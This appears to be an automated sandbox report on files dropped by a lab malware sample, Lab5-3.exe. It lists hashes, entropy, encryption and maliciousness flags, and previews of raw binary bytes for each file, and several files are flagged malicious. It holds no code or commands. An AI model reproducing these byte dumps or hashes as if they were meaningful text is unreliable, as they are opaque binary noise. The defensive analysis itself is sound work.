                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41152
                                                                                                          Entropy (8bit):7.995841011144785
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:m8MIUmiszAk3bnltTou/KAkgXbuCGYmHmdUt5PiW1uvek8QYi21vpDtUZ:wIqI3bTKMuFG+5ZEANpCZ
                                                                                                          MD5:3446D217F9D73C576D43CABE478C8C68
                                                                                                          SHA1:9500447A24E20BBF55850E366DBF5BA80501598A
                                                                                                          SHA-256:2372CA857AF81DA862264AFD8E4D330F78281237BF68AD74FEB03203740DC8E3
                                                                                                          SHA-512:EF093EBC956A5413631306921FE48D0C96FB9A22C884FFB9CB174669E00CB6C531E0176CDD8960114F920C74A76E628E8263DB1E645AD17B75C0C044F354BCAE
                                                                                                          Malicious:true
                                                                                                          Preview:..V.....@]...d8c.?.\O.....r.....R.2l...RM.. .r.X6u.-O.qM~...P.i..wO..X@.T..uxiai..z.A.!*....b.........1.....u....+....c).....=G}v.......*]...g..o+.].%..K...:...>.:.f....5......6g*.T.y.[....Z.3.^n.~m...o...W..:8.V(.....R.L..M...........B..5@..0|._...2.....o4.C..k...R...=|.@..-..;*./....R..2..o..f=.......U.f......S.@...p.U....=...46+q...l.. ..*....a .yE...i*..B%dU..}.<B.....5q.tS.../....f`.w.'8.4E.<3.7.e<......G.X.AY#..$..E..w.L-;c...2.a.8.S..jm.:.J......#..h\.\.Y.^.'*...cB.n.d.8...V],.z..m."..1..'].......r...I..s}.gnSGE..*c6.....L...:....;P$....C.ffB......v.Y..L..rR.p..Q7.'.g....a.=...vk;..o.[.....).i .u.....@}C..&.8:W}/.<]...zM`.l..;Ab..."..&.B.=0..#Nk..N.....v....g.{*ST..k.......V>.....L;..?Dcv.....;\y.j%'..an...=.1...n.....v......@T./8r|.d...[hh..Dg....u....5....Jc..~.....<..A...;.".:.........b...t...y....(.1M.V......|..u.....f5.D}..`.%.3h..v...+d.....}....y..N.9yj.I.g.I....P..s.=z..^G.u.l.e..q........H..^.... ....!(.D1k...G*..m.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1751179
                                                                                                          Entropy (8bit):6.764733620531048
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:yqkTJhISUX/CjrjYz6J9dDpwBcOTvz2EsoTE+rQU03GQS:yqkJDuBcGjf
                                                                                                          MD5:58DEFED82ADD3E6117B9DBE63DCB0D30
                                                                                                          SHA1:B49AAD0BABF0D2ED238784DC54F8141F02C53B7A
                                                                                                          SHA-256:D96FC72C343B1E225C62AB22604C6260CC9FF4D6D453C17EF0789D0A64A63BC4
                                                                                                          SHA-512:B0E93F5AC94F4D7738E5C1286ABFBBF95D0B58C8AD30F0526CCF8BAFB488B51A3FF36BC90F56AAB98BBEA798BC6D514F04DB1BD0B52F0198B36161A3EFE30549
                                                                                                          Malicious:false
                                                                                                          Preview:D..S.2..S.).....e.B....mj.....Ic..1....#8yR.2H*.^:.3.uq-.j.Z.S...o."....{Dr..FX.E..i...).63%.|n....Y..Ps...xo8.2R....)..J.Y.....Ck.J.K.d|.h.Z.jt.4..qH.L....v..A.|.vw..6Q.*..k.$.X......h..N..,.!...)bL..L..9.Q..<n.N).X..c:..`@..J.....F....Wb.2.i67(Z ...~.(...}.K:...j.a..(....s.b~...%.9$..*.*.TvYv.|..cMS..x.....!....S...K..1.7..>"t,..;...0}.&..7..)]B]B.[*..?$L.L.e.cG.)..!....RP..A&.#w..#...+a..oR....w...e.....8dV..0..Z._)........?W...um....).e..O..)A.]U..-......|<.....`...ZFMS...v.P.... jr.4..%.C..m...3*f....o...K.c..H..Y..%..Y...{..W.+O.&."l.#............}wv_#ksTx,.].....D.t_;y5.z~I.....`.t....@.F.....0.h..W.t..mv./...........{...>fjL.$Y....yU...{TL.C..v..D.-....f.*..E......t.....[...]rF..9e+..5.....|56*....=.B.0.[*+Dd&.....x..j...)..xo..Hv.^...e\D\..d.'..p....a..Q..V...-...v.~e.t.R.A(....P...![z...x........t.]pf..........`m@V4,.U-....l.dk..;=..QR=y...t........].f......L../!....k...|Q...Y....7y.d.,..gy4.......T.._.Y..."J@..DH.....!.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):468715
                                                                                                          Entropy (8bit):7.160856142090671
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:Jc2ycFUUkAECZWtm5lcMjOZpJAe0mPgTYMrMkAh158PrXZor1ziOZ:J8GrpZWticMjO+5mPMYMtdOl
                                                                                                          MD5:6486DF70C2968F0AAB2EE8AA8C9055A3
                                                                                                          SHA1:D8870E289D26344A8AF58E6EBCD710C4F2BBBB62
                                                                                                          SHA-256:0855BFEB02699E98EC20973F44650E14B423DBADB3D575942A423D13B7F4F591
                                                                                                          SHA-512:FE286629A29B2C1B79AFC25CC4A9ABE10928C67A57AAAED025A3DFA2176ECB894506AA16B91791F3F89FE601404364BDA29EBC6B2BB6A4A494F8BA040D333234
                                                                                                          Malicious:false
                                                                                                          Preview:*..7Fxd^....j........b!.?..w...R........Z#2.[....9..d..;q.0H.XJ.M..boc....;.....R.Dv25g.PM.6./A..@..............a*5W....=.5l.\x.K...J.*j.W.....0.........S..=.~g../.....p}..N.~..#. ...w...6.~].......~uJ.a.).>\|..c`.?~f.5!_..-.M..u3S.z..^..&4..O..V7.....X..$.Y.....s..(..D.4L...Y5N.|F..C.D9`K........X.`.W]..>.Z.......?.BED;7.^&m..w....2......ZX3./}.o.e...4..AB.q..cF(.....xk..._..o.`M....8...-.,..+u..Wb..%.....uo...2.....r......cV...;.........gK...#v\.#V...s..0/.5.W....5..._.;....e. .B..^..SPy{X.)A....Kgn}..J.(:..Z5..4.M.....7..>..K.Z...@..Yc.........7.&TR....N.i.=o.......2...c.z.Q..>...K+g.0...&..Pe.<. ....V}is..)..]..W.`. .y".0...-X9V....;..a..Nv*.....^.h4..PEF.f.-p.c.m..~.L.x.........?'.N6....@..s..u.i9F.....q;.f..s.....B.O....]........6;.X.q..\../.aK@...WQ...=r]...t.Y.[.n.0Y.....=?.&.:.......tEd0...v..[-...W.S.8...LCeG..b..&..:).T.M....$.....Kl.....j.2......b...*>v..1.B.}....T2(@5E1.8.w?^......K=|......qX+.>...A......8..-..X.d.I..I
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10432
                                                                                                          Entropy (8bit):7.982522562330148
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:GN9L0kvCWU/I8Xd4EySt3Q1to15GTi9FPbNs5fY0iL9XAN/KlKzRZtdJlO4SL0Cb:fkpa3dTyWsiHFTU949y/rdELtb
                                                                                                          MD5:3DB689A70FB1F9F792A2378A03991CB2
                                                                                                          SHA1:2994A70E0376CE0DB075CDC094C4EC5B435972D1
                                                                                                          SHA-256:3E5E629705918701571156D478F4734606F855399BE583764ED9BDEB3CCADC17
                                                                                                          SHA-512:48A8285EBF2BC512E9E9F316A248B481E35785A6C1951ACE6E1F80CF9BC51E8467A285756E2CABAA3C525FA5FA6FFD145315833587DB3A4DA8DAB0A48F01CCE7
                                                                                                          Malicious:false
                                                                                                          Preview:.. 7.........R._`.. .EX...)+....."Y...NI.~..._.....?....Y...Mo!.9.....p.{.6......?..%..=....$....[...G.H.....H.kW....sm!A...J }..uV...........+.....U..0.>.......8.)..;:....n..o2...8.....M...cb...o`&...t...=.Z..z....i$RpQ.?....r...'.g.g...cj...>.wyDUoDr...\kj)m.....k.....>....X2.hi5O& 5.]..U>.T..I......CU.X{..5'(.]uQ........>,>.Y9h....K...Pc,..........~.X...%..S......b!...^....p&(.......-{.5.$...... ....p..;g"u|..r..J..D.i.J.'...L ........|.{....&...#.........7v....[...T.e...}...j..`<.....a... .....d...m..[t........y.......p...0.+..Y>Oo@r..i..v.....YW.c;8.....5.wk....,.2..$6.=`...*...`A....?.....6q.j.$......T.I.../_.b.f.....}.i>...D.)..J:....{.....6.E)ywY.V.T..$(.......Z.I.4t.p.Q".b.....a.....~..O}.x..b.[.....].6..q.e..f.o....;.._..Z.2..X...X..e^..@....".....L...~.A.._.... .U.1....k.^LNuBP.=....(".B...F....ln.`.3k{.L.yC.Z..[..Lr.=..$../_....@...#AI........D...^Dl..1...9.m..e....A....U"..\d?t.?V...l*vD...i........u.z&..f.AC..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17328
                                                                                                          Entropy (8bit):7.988451163473559
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:8Zy9pMozhfj6yMLVorEmSuVoAdvA2eLeK95/NUmQtb:Uy9pMsfmybtSazBxeLeoNFQZ
                                                                                                          MD5:6190CC6BD2DDC1C1256414B76ABAB555
                                                                                                          SHA1:C74A4F17448E14C2B09DB4AA04E922EB17B52558
                                                                                                          SHA-256:CCD01DF98DA77DAC0BEBAD5607092F5F5A78E6EBA91A4675EC51292BB6622933
                                                                                                          SHA-512:53DD2B53F1C82E9202A9A4530EBD756278DC80DF983E622CD121767D566930A640340DA484D60769A7888E935F26D5A43643FF47A9F225B42B9090EEC476BE0B
                                                                                                          Malicious:false
                                                                                                          Preview:...?b)Zh..a...W.=K.=P...Q.A.l..#,...{.z.gT%.`...\........(.=f.?....`e5.D.....u.......r05.z.. .mk.P..P..Z...../.............".a...a..2*l.L.G.U..F.^D... .....I.d.A.jN..[|...C<.(..i../.q.J..T"h..../..!..E..0.....$.x..,L.'f........F..P...P..)..}..I...ZC.q..)'._R.4^g.7..rG.t........5.A.;...Em."*.F......x.....@u.tZ...g!..W&...(......../<..~n...X=...X...G...r..< b..0..e&.35k.d............`KE..Q.<c..4...........=.....b..l[...3.....&.ZDT..>...`x.._}g"!..#C!.4...N..A...8~...Pt......Z....#<.E ..U...8....?s..]..".C.r.....xW|'.5L.(l.~l@.._.DX"a.B.....W.C.d..g..5.R..72..P..*"e.3..D*E..J..W...a..DPe?....n..z....c...2..<t......o/;.E..3vy....L...6.:...D...{....._....g.D]..U.?...XJ|."8.G#.z....gW=..G..L..........V.h.E.|....v.X `..........o.M....~EXd.D.E.9~....>..^....-y...D.h.\...........q.C...O.Y,.].a.3{.\.X.].._.k...yuHc...=.aH.O6...Z(mG...-.!.P.6.....F6a..n....1.Z.L)..9...~.._._.....|..Q..H.>.p^..G..T....\.......W..K.8..f...0..}.....,..1R.DMNm3......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):106672
                                                                                                          Entropy (8bit):7.998206903452869
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:cQa7/7JIp8t53Zdpr3j+/hufRV3EpXGWk4utkZ:u1N7/x36EZVSXGWk4tZ
                                                                                                          MD5:CE9B938E2B2E3FEE7DC1C5D7BD77B5B4
                                                                                                          SHA1:726CC9EA333E191A090CF5CD6DF31F5796E9E44D
                                                                                                          SHA-256:D3B742D2CCFF477067CFFA6A4AA3D23FF9D8208CCD06EA9BD59A9A683BBC264E
                                                                                                          SHA-512:52FE9581092ABC84BC0E95A404DE5CDA7227E6ED84312B468E4768278E897C8172A1B2E6A9F81BDDFC7DFD96BFB37885D72F9324691EE84AC6A2C4A78073D024
                                                                                                          Malicious:true
                                                                                                          Preview:....*..,Sk....FMH.J...r*W.J...eu.. 0>..(.y.8......Q.........^v.2....*.R...Sn.{q......FDhn....@a..^NC...4_0<./t.q.[d.Z<...Ch....:..U..L.....+....QN.`:..G4~!:......=owQ.i...w...f...u ...4.L*C.Co'...u..w........|*..G4....2....z.%r...k$.t..q..l.?.~.f%...0u_\8M@........;..r...bG..a`..Zb..... 7R.I..W.O.J..L..P..[.b.kj...c..s..U.N*..*.......a. ..T..:Q.S..g..`..N......>..@....Y...&...9..mSb\.or[.L.mr.....E)".......:G....F5C ......>D.QG.c:i-..7.DlH.}.R...)%uQ;..]H@0.1..z..8..f.........Y....{>.i7Q.eR.V....j.|........1.w...<F....4......u.D.I...x<fkA..?.$...Y../...8..}..D.....JR\.@zs..x..!...Dg.1R...f'.....G_.n.2$.....t..K...p_..V.3z.u'./M.t.&_....E...wN4.It....."Y..T.Y.(....Iy.j...k.t}W.....L-.vyF.n1....*........wvkhJs.HI..k...u=..%..&...M...P.dk...q,..n....._.c.L=9.....s....w$....dL.b3.^.h.]V. 1U..NU..~...7h.cD.a.}......bvM..y.].,.&.x.a..b...N..(..t-..9.M...L..rf...CY..........7..;ms..Oj.%2....b z.........U......sE.|..0'-}.....Xl.?k..c........z.t.=...!....e
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15728
                                                                                                          Entropy (8bit):7.989686036483232
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:BjKiLJ3zvJv3ZrW4TDTxmxWtjsaUOw/5p8tb:Bj3zN3HDTxVsaUj/5p8Z
                                                                                                          MD5:CB1865DBA9F973A29B103CEB5757B3EF
                                                                                                          SHA1:75B1E02EFB840D1608A6C60FB75B51CEABC83B94
                                                                                                          SHA-256:0340E06133DB3A19FD231195C89E8289BF11C8D7B3FE18E1AD2AB0A9B6B111D7
                                                                                                          SHA-512:65E7A84BEB1FAC834DDA379153B925BC8737F8A0487BC5B2E1B0453B3EDF8DDECCDC5F0F701D4CCB6D2927FC57905E25F7D8EB30D73B868075E8CFF3EB076B72
                                                                                                          Malicious:false
                                                                                                          Preview:...Nv....N.L.....~}K.Kvr.3...+..'.....+-LPO\9.,@=..).qf8....1w.l..y...8.Z......{.9...U...T...y.p.PA.\.!_].....vP. ....L$.....V..-..V.K.O.O...C.W@r.Z..8@W.....;.-.../n".y|.U..C.....g25..\....(..e.6"...c..Q...p...X.#!.......1...S,...VU..2.6.........9KU.QK+.j..J.!.c9..3..A.'..A......Nx7..VRq)t...#....6.&;....*.._..F....k..w Z...28Yc<..t..n...0.m.=kx'...T./.M...<.=...z..LH;(D:"..G.. ..e.x.U-~y."..+F..S...}7+.l.C..4 .f..v.C.......}.. ...m...^..y...=. lA...5./....f.5t....%..U"...?....7=.7...nx........Q.[.Ar9.....8.L..2..>......]........I.$. .......{..0.......N........d.F!CI$..c.vP.O..".K..k.a..1...Z.L.[7.Q...u......U.F..0...8....^~....t`:.E..;U5..q..73..T..B..E2..u.h3=...^......5......Q.1'6[.j/4..R...."..........O0Az.K\...I...|....y.G...O.|....#....0..W.@.M\.\....mt.m....?o......D....@8t9...+......mnV0..;.m.4.............dxh\k......%\..Q..l.*g.)...e.......G...../.1b....s...U_.H.%.PX.&...#M]nO....z....s1..F..6T......N......'.j.....x. ...Ti..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4432
                                                                                                          Entropy (8bit):7.964090680825923
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:VqTy2ek5PkUOfZSezqfXahrXG/8Gx0uKeY2ElUJ:Q+2jkFfZSeufKRXmP0Cb
                                                                                                          MD5:117A9620928C3CF5418710F74C9E570F
                                                                                                          SHA1:9703E69E8E5778118838571280DD3B29A0EF023D
                                                                                                          SHA-256:92824B3BC2173F6DD7F6E2A9E716E1114B496AA06B6E3D65B6D919380A9BE31D
                                                                                                          SHA-512:679FBE1FCE6AFD27C6B1CE4B3024E7DFA9D550E38AB849CC4A163F91595C2423F6616F85834A2BD21262735970FFA86D34E09D7CC92F879A4F7960F1393083B0
                                                                                                          Malicious:false
                                                                                                          Preview:=.01.).?i..#...u....."..ye...GZ.O ..v.16..N.-4X+..P....Y......O#9.C$D.......?l7..]L+..W..v.l&6u.w.!..&qdvP&........}......3.gU|uU%.....0.1.3u............v....{L..U..'..;........K5h.y.......!..'*<._G5K...$.....8t....D.g..."0>.J`N.'.........e.61...T....GU..R*...).>~.H......k:.)../.....9.}%^.V.Q(......f. 66.[!.!.r`y..T..R.r.(......P.XYQ.&..U]....y. .........v.....QJ.N+'G.......]...q.Z.6.a. ^*gpI.k....yRm....'G5W...5m1m....8.....L..R.]....rT8..5m...u.6...q=..aH<.a.....:...gKN...........5......C7.|o..[.ly..60..}..8...<.:.U.r...br.....)...r\..e.V.......C...D<....:..*.@..i].f..4.....T.../..O..-...+......4..........-...... ......a.....>.. v ._."_.O../O.r.......!...p.<.&.....n.@l.44....M.0..).(i....~......3..Aq2a.. ..X.0...._.....VH.? .Wb.~\zAt.!.4k0...n.q3..|F..}.. ...|r.#.(a.)....Z"...G........u!.cg..o,.[,.c....:F.nKk.".CA..4.X`.4...F.|6.w..... H.._..u.;^4...s<.'.m. ....#~.a.c.SE....};5....*.w.._.?8.z..a.~.8..........?'..t.G...~...Y1...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):58608
                                                                                                          Entropy (8bit):7.996620746972522
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:vmvNLJyiLAaOB+PuzG3cPZGC34VVDFI1L/1SqrgPHcJ2Z:vm1LJbIIPuzGeb3QO7SRPcJ2Z
                                                                                                          MD5:AEAC5D30CB9FAA59CFFB253BEA5E45C6
                                                                                                          SHA1:DFF3E385AE93060EE6EBD7A0D72DAFD7BAA81AC1
                                                                                                          SHA-256:D58E77D02E302E2E1DC1B62B20E14C77363A3CF6FA201A30DC4EC2476BD6D218
                                                                                                          SHA-512:F8AF42C974DF5D1F45641F127CC1EC6A1A5EDE8DB22A74E4CB3D0F1372BBBCC74AAFE43B6771981949983A4745F041FF415E36DD67FB9C9A7591A30DB76994B3
                                                                                                          Malicious:true
                                                                                                          Preview:.t....XG."'+.......).By.&9IT"......TE. .O(..h...[x.0.'.@..T.8.QN...b.../....R.#..~.i@&s.3u.u.R;..%bP.t.....A\,.~c..Dm...)..XI....>.v..\......x;%.*i5...~...~.|..t...K.0..9..A.3U'..\U....\.]d.U...3..M2....L8........&Td.A...~d.. ...I.P.6.x.`.d...@Z.E..".K..3...J.D..O".i...Ke....w...q..[042..".D.l..+.c....W< ..T.[..o....%.@.YrHM.r...a.>r.d(]..Jxk..S..rU.%I.....,..^...+..u...........r=....7..e.QE..a..%.UC.Z..DX|J.Y.@e(....`3...'^..}z..m..s.t.......#..d.W|.9Kj.)..'.......0?<..j..cX...#..u..{..N..a.z.-0..).?.|3...<;<.......re..pK../.i.\J=/.Y.}..A..2.#.O..l....K..mz..c.R.f.._>.7.mKDL.{. t}....1.*.7...../`,>....&.../...*..1Y..y....V.....<D..7..>.eq.#q~..rt(...K1[.X3.k.e.V..3n...!y...6.].#...Ij...#].#j.......V.#.;..n#....l....%.~.<.....~..7].Z..Z[l.6.....y..<tfF.........<..I9...... h./>Z......N..[.p..4.Z.F...........UU.@.?.IVz..Y.uH..!..su2w.f..Q2s..?c+.9f....i.x.(...n.8m1......("..\"g......~..e.._.).W,Tu@..k{....p..+!..q.-.&E).d4.O.4..b....!..]VJ..k;oX.{Y~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3456
                                                                                                          Entropy (8bit):7.941370929475792
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:AZrJtjw6gom96QGySXq9joGx0uKeY2ElUJ:AZFtjwBXT9jL0Cb
                                                                                                          MD5:6A8D3B822CC11946D4858CA796287456
                                                                                                          SHA1:8508EB8CA5880A956C683BB197579EDB224A2E3D
                                                                                                          SHA-256:474EF97601910A9ECC413B31038D69AF4867989F9C19CA8B1432531B76B56E62
                                                                                                          SHA-512:AAE279A9ADD0EF46CF785D243528CD7719297B126300D95D0F7CD3EE5664F48C0624036ECEA7A1E3E64C3BB03DA8A36E28CA146089905E439D3650FDA6388CA5
                                                                                                          Malicious:false
                                                                                                          Preview:.E.C.....P8\8]...x'.).....C..d...q.m........._..K[...%.jT].o.-..Yn.t..>..v.0%.:.....i.....:..aP^.XFZT.Y..C..AHZu. .}F...H_..0..9=..G..A4"qyf.q..n.5z.7M.z.p...^........1{........[.......5.........1j..9...=!.Q*.....Zx[....`H;2...h....iQ?.........,*....J...Vh(..Z....@c.8q.R8pY.D.<..b.).r`3.Z.JN.....]..I..e...{M...c...YI... .n...#..;y..U..@...gx./..C..j8.!+.rOR.5...}.%..........P.1.{..p.c.t..OA:O.KL...T..I.[....h...Y....uj..Y)...nSy..^z.......+.L.....^L...>K?~..pj.^.^.>.HH^V..Z9....m(.lk.5s..&)...;n..!..x.^y..48DQ.%dJ.o.......j|.t6.N.e.3..4rzc%......".......k.@2.u?....R>.D.k.8...;5<.L2I\......'....".....Re...M..P._...Rv...2G.....BG..d.H..r......%.....c..A.{B.k...B.....i.-pc.GJ...*..(...Y.D...%.L...FI...K7V.t.........Da..km.f<u;o*......,2.....[..3..l..$..&7.gJ=|..n..\.`."..'.d\.!&.8..sl*..........."S.....1....K<..F.....)N.j..fKH.B..S.k.5l......oD5.X=.C....T....`..8.]........R.h.+.]:....CO#.1..j..|Z#...7.x..Y....qC...../vq..U..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):546245
                                                                                                          Entropy (8bit):7.406893162867994
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:s3vvat93bB/LPYrK7KH4spkoejI3sl0WaE0lA3OHWWlAKyebWvjOQa:mvQ9rB/nU4spkoN3sl0WaEbOQa
                                                                                                          MD5:F8A2ED89466AFF6B71AA72C367EFF15B
                                                                                                          SHA1:F00644AC3E4962ED42EAD96FD77237523DA4D281
                                                                                                          SHA-256:9D818B7966DC0267B716FE016A4AF02F05A93CBA915BBD043ED93AE97AA72FDC
                                                                                                          SHA-512:05EC7C9966482091FB42B569629A9F75E3CC8556A92FA62EE2F67E93E69FA21FC746D8B1CA0B829EF8390630BCCC6914557D88019A840F2B79F93FB06F4697C8
                                                                                                          Malicious:false
                                                                                                          Preview:..R...V....GU../H.w..c.yPSA ...12...c..p..).=.a{..M.n]..c..d..,..R.....5.....].~.....y..E+...r......Sh.....c...P..|.LJpt...d...u.t.N:._K.&..0....&W..(.....#".....j....!.Z8...vk.h...F.3\'IO....H...1[..XX*..3.3eL..7..q..F..w.Y. M.c...7Y.UoH*..O...2...vQ.PT.i.y..U..}0....z.CGP..L..$..{..}.o..xv.Ti<.%'..sQ<...YK3~..%.....U..-#.7......h.E...&...-U....i....j0NeC,.A4=....rV.|G..........G..F.$k..\.Zv.1..F.F.u.8uy..#6O.S...[P.6......v.m.l3~.'.tX`..8.H....]K.,X..'Q..@d..H.e..gg.].5......*.0.4Z......_R/.<c.h/.........~....O`.......r.Qr...5L.5V..!....';F.L9;.8...(.ad.....S.....^a.]..w.L,a'....\......I6."^.!a..,.Bu..}e.`.Y.s......].0.. .uf8+._.M.../%-.~...Ky8.7.t.>..{..a.....N.){.4.........n#..z..C.|....`kH2.[..wk..:d^.......SF.!...k~.:&.K..s:#.VJko.TdaI\D..,Jn.B.Q%..rH.)U),...........#H...l...,...e..........^...K_.]}..a<`...X.`RY.R.5.....I.x..&9-!F'.N.....I.Z.1...,...G.7.(l.+t....Eo....SL.`.........<......x..+.D.4w..u..&.(Y..B..?.qX....d.k../...\..A...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3056
                                                                                                          Entropy (8bit):7.938769334592624
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:i2se6BmeK/lxSDlVQaOKysP7HfUTid3hBaUoSGFcmeykEdEElU92i:V6BmealsRogIGx0uKeY2ElUJ
                                                                                                          MD5:206B9455FCCC885EB6E95579D83A17CD
                                                                                                          SHA1:AF4AF2ED6DDEBD796EC60E2F21F3C13D395EA780
                                                                                                          SHA-256:CE7F33C3129DFCC3686796C2E8A57D66E98362D82206B718E2C16D5DD7B3B69D
                                                                                                          SHA-512:9C082A37416A242F1A881DD213AD2BEEF24E00C4D9404C947795263FEEE92C54B23D31BDC9D9E9448F49905EC7EF646D3CB33B1C6AD9038C9AE544C6AA186F42
                                                                                                          Malicious:false
                                                                                                          Preview:L....e.&,.Iq.U..b.ktJ...w.........<j..\.h.-..4.........j........S,..f.../..D........3-"g.......C.J....^E.9-.G.!g...!..w.;Z.....w..[.8Q...h.b....).2..k.[....b....._..i..R.!8........E.A..Rx.3pVPeL.?....;.m...k1.....,{..J.*..\8^.s...6..*i...>.........+cU....T.m...m.....4i...a....]..>..D.C..3**.B0..;.9@..W...,|n..........i<........h....c...3..m.X.%+.....HV8Y....>...)<...d.q....6.....>e..Z.o...F...5..G..F.#J.8.-.$.......r.....nd.g...\............9...|mMZ..<....f.K-....".-K.!!........-.P.....7.^~.......b.u..dt.}...SE..AS-N...\..w..!Q.g.npr..Z-.A.T...?{.e.m...iEx.v.bc.=..59..P..Z....).(u;M...*..~O.9.M0[.b.....Q}.(...T.?.9......D.C..0<J.g....i'c......1B......C...Z.s$.n...P.Cdmj........"w"..eab.......):rL.g.3....0..+._........Z^$..6......=.:4`!C.].`.<..e. ..P.;%...a...%...!...b..........(..Fm.d..|....$^Cq25.7..L..W....HA......(..>.........-...s|...Y..t.4.....kGM6G..U.D...T...x.N.y.-g)N2..@ ..u......}G..uSP.....iL4C....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9024
                                                                                                          Entropy (8bit):7.977591740583159
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:zfK+cBGMCSHeRYEpV/j+gNyOl0Nz4vYIrkMRA3lONYwUH07m0Cb:zfK/BZCSHAbnFl0/HJgPU0mtb
                                                                                                          MD5:DDF76A59C6207D6EFA6F15EDD4E57C67
                                                                                                          SHA1:EFBE80252F0452A945E0BDEEEB4D043BF4E7DC9C
                                                                                                          SHA-256:5F13D0301080D217D90422629B6C9DCB979B7B5D44D882E595076F249F7BC0EC
                                                                                                          SHA-512:F4E24BC6F4D18AAE1B4EFC1D3656FC4E9FC9D37499E1D66BAEAEAD397D74198579FA7CF2CAA5DD3BB21603F92BD8F16AA2D17BB62DD53F59D0FB43300B5A10CB
                                                                                                          Malicious:false
                                                                                                          Preview:Q.nA..F{!.V...Q.<.2.r..x..2F..........]p*.c.C.......1^...f.<.0n3..~...+.YXd9..2.........Yp.T...R...x..W`.:...M?..L.l..7..h.fm8.<...q..[.C.V..<..9...{:I.uj. D..'...e...Q.........5c].j.7.m..Z.......r..IC..I..d...^.G!s.R...YR.s.,..I.....2.7:........I:~{.d:...^...q O..T......}7n.3.1.b8.I....S:..X..r...{N.v,...a...H..[..........o.#L.,.l.m...@.k...F....f3....D...B..B..O.g..V.D.~.)?.a...XE+./.y.u.....p.~.....y6f.L. .....|..:.?..mri.;.......q..G.DS.C.32X....f....Ws.9....U...=.............B.2.u.<..?..-.g. 3.~.s......hT.<.*S.LkM.....+..f7.q..U......x.....r(.U.J...M...............x....+...b+.....X.~....%c|.~........l.z..{......%.u.C..s..Y...o..........R?.f...f..}.r..GY..y/.^&.%...E..Fs.J...kL..2y..l8TCAR.S..... ..m[../l.t..TrE.5.V*p.Z.5......+)..n.....E,...v...6o$....... ...@...[.2.KF..........*.V[.W....g.M.<.r.[.....&..*.u../y..m-..Y.dF..=\..&'...H.%....En.......,.s..Ie......%.w.f6,.....X.d.#k..\..?.ul)7.+.1..Z...8k......C...G..3\.;5.nb...q".d.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):45904
                                                                                                          Entropy (8bit):7.9962807454203135
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:1fJIAgaJ+/fN6cjWUwVLVTJByuJiaGQp1HjUlofIRaaZmBPoOuE1aylLY3Y83ivF:wAgag3NdSUwVLBy6QyHj9x2ePoOMy9Yy
                                                                                                          MD5:3755E7802D6E07697B8CF662756D5B76
                                                                                                          SHA1:918B8A1969028A4D95F79BEEA91C579BCAF15B7B
                                                                                                          SHA-256:37737D124EC96340DAB46FCD2BEEAB333B51D666C0EA632A077AEEFCE7621258
                                                                                                          SHA-512:6FEDE8383421F2E83DA34A0E2DE7111317A39159986755AB75DCBEFA6E4832F2F8E926176133388341A372E159108326192036C6DA986C8E68AC285BAC542925
                                                                                                          Malicious:true
